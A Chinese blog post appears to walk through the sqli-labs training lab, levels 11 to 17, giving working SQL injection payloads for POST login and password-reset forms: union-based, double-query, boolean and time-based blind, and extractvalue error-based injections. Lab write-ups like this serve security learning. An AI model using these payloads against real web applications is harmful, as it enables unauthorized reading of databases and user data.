美文网首页
sqli-labs level11-17 POST注入

sqli-labs level11-17 POST注入

作者: z1挂东南 | 来源:发表于2019-07-29 16:33 被阅读0次

第十一关

显错注入,单引号闭合。
uname和passwd两个参数都可以进行注入,这里在uname注入。
数据库名:uname=1.1' union select 1,database() #

1.png

第十二关

显错注入,双引号闭合,把11关的单引号换成双引号即可。

第十三关

双查询注入,单引号括号闭合。
之前GET类型有讲过,这里不细说了。
数据库名:uname=1') union select count(*),concat(0x7e,(select database()),floor(rand(14)*2),0x7e) as a from information_schema.tables group by a #

2.png

第十四关

双查询注入,双引号闭合,把13关的单引号括号换成双引号即可。

第十五关

盲注,单引号闭合。
正确页面:


![4.png](https://img.haomeiwen.com/i9221879/69e57985035c8124.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)

错误页面:


4.png

数据库长度:uname=1' or 1=1 and length(database())=8 #
猜数据库名:uname=1' or 1=1 and ascii(substr((select database()),1,1))=115 #
数据表长度:uname=1' or 1=1 and if(length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=6,1,sleep(5)) #
猜数据表名:uname=1' or 1=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=102,sleep(5),0) #

注:时间盲注的时候,使用sleep函数一直转不停,不知道什么原因。

第十六关

盲注,双引号括号闭合,做法和15关一样。

第十七关

显错注入,这是一个密码重置页面,所以要在用户名框填入一个已有的用户名,可以去前几关查users表。在密码框进行注入,单引号闭合。


5.png

数据库名:uname=admin&passwd=' and extractvalue(1,concat(0x7e,(select database()),0x7e)) #

相关文章

  • sqli-labs level11-17 POST注入

    第十一关 显错注入,单引号闭合。uname和passwd两个参数都可以进行注入,这里在uname注入。数据库名:u...

  • sqli-labs【11-22】

    摘要:本篇是关于sqli-labs第11到第20关的闯关记录 Less-11 post注入,单引号闭合无过滤,有错...

  • 搭建sqli-labs注入平台

    搭建SQL注入平台 docker搭建sqli-labs 运行sqli-labs 初始化数据库 访问sqli-labs

  • Sqli-Labs_Lesson_4 GET - Error b

    Sqli-Labs 是一个印度人的开源项目平台。里面包含了基本的各种注入类型,同时又有get和post类型,以及一...

  • Sqli-Labs_Lesson_1 Get - Error b

    Sqli-Labs 是一个印度人的开源项目平台。里面包含了基本的各种注入类型,同时又有get和post类型,以及一...

  • Sqli-Labs_Lesson_2 Get - Error b

    Sqli-Labs 是一个印度人的开源项目平台。里面包含了基本的各种注入类型,同时又有get和post类型,以及一...

  • Sqli-Labs_Lesson_3 GET - Error b

    Sqli-Labs 是一个印度人的开源项目平台。里面包含了基本的各种注入类型,同时又有get和post类型,以及一...

  • Sqli-Labs_Lesson_5 GET - Double

    Sqli-Labs 是一个印度人的开源项目平台。里面包含了基本的各种注入类型,同时又有get和post类型,以及一...

  • sqlmap的使用

    摘要:使用sqlmap注入本地搭建的sqli-labs过程记录 学习SQL 注入,一直在手注,关于工具的使用的学习...

  • Mysql手工注入

    整理一下手工注入笔记,以sqli-labs环境为例。 1.Mysql手工union联合查询注入 输入单引号,页面报...

网友评论

      本文标题:sqli-labs level11-17 POST注入

      本文链接:https://www.haomeiwen.com/subject/lsnbrctx.html